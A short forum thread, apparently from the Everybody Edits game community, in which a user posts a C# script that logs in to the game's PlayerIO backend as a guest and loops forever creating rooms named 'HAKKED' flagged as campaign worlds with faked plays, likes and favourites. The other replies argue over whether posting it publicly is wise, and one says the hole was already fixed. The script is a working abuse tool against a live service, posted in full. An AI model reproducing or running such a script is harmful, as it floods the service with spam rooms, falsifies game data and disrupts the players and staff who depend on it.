Do you think I could just leave this part blank and it'd be okay? We're just going to replace the whole thing with a header image anyway, right?
You are not logged in.
Pages: 1
look
static void Main(string[] args) {
Client c = PlayerIO.QuickConnect.SimpleConnect("everybody-edits-su9rn58o40itdbnw69plyw", "guest", "guest", null);
while (true) {
var dict = new Dictionary<string, string>(){
{"IsCampaign", "True"},
{"name", "HAKKED"},
{"needsedit", "yup"},
{"editkey", "1234"},
{"plays", "123456789"},
{"likes", "123456789"},
{"favourites", "123456789"}
};
Connection con = c.Multiplayer.CreateJoinRoom("OWaa hakked by u", "Everybodyedits219", true, dict, dict);
System.Threading.Thread.Sleep(1000);
con.Send("init");
System.Threading.Thread.Sleep(1000);
con.Send("init2");
}
Console.ReadLine();
}
now hope ee staff fixes it quick
Offline
Posting a hacking script on public forum doesn't seem like a very good idea...
It's ok because there's only like 25 active people on this forum.
@MAMETCHl on twitter for the pfp artist, @snuffyowo on twitter for the character drawn in the pfp.
Offline
Posting a hacking script on public forum doesn't seem like a very good idea...
it'll help it get fixed quicker
the only downside is a possible ban
Offline
Offline
Too bad this was fixed yesterday, new code isn't uploaded yet.
Offline
N1KF wrote:Posting a hacking script on public forum doesn't seem like a very good idea...
it'll help it get fixed quicker
the only downside is a possible ban
Like we didn't know how to fix it in the first place
Offline
N1KF wrote:Posting a hacking script on public forum doesn't seem like a very good idea...
It's ok because there's only like 25 active people on this forum.
on the other hand, the people who can use "a hacking script" like this are largely comprised of people who already knew how to do it but weren't compelled to.
actually this does raise a good point though. Why do we run into this issue like once a year? Someone keeps pushing an update that drops the patch
Offline
Posting a hacking script on public forum doesn't seem like a very good idea...
Lmao, if anyone here knows C#, that code creates tons of open worlds like that problem we all had last year with spammed open worlds. Ofc its been modified to create campaign worlds which should be fixed
Offline
Offline
Pages: 1
[ Started around 1745241840.7314 - Generated in 0.049 seconds, 13 queries executed - Memory usage: 1.61 MiB (Peak: 1.79 MiB) ]